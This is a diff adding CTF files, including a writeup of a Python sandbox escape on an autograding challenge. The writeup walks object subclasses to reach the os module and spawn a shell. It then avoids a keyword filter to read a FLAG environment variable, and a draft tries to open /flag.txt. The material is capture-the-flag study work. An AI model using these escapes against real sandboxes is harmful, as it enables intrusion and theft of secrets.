Second CTFs part

web-cmdi/04_autograding/test.py

@@ -0,0 +1 @@
+print("echo 'aaaa'")

web-cmdi/04_autograding/writeup.txt

@@ -0,0 +1,28 @@
+Python sandbox blocks import etc.
+
+From here: https://github.com/jailctf/pyjailbreaker
+https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md
+Commands like this one can get the os module and execute system:
+[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')
+
+The sandbox still bans keyword like system. So
+def fibonacci(n):
+    # Your implementation here
+    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
+    print(os_mod.getenv('FLAG'))
+
+I tryed and found out that the FLAG is also set as environment variable and so I got it usig os.getenv('FLAG')
+
+WORK IN PROGRESS
+def fibonacci(n):
+    # Your implementation here
+    #for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
+    #    if 'codecs.In' in str(cls):
+    #        print(i, cls)
+    #        break
+    INDEX=127
+    dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
+    print(dictglobals.keys())
+    op_en =  ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
+#('/flag.txt','r')
+    #re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']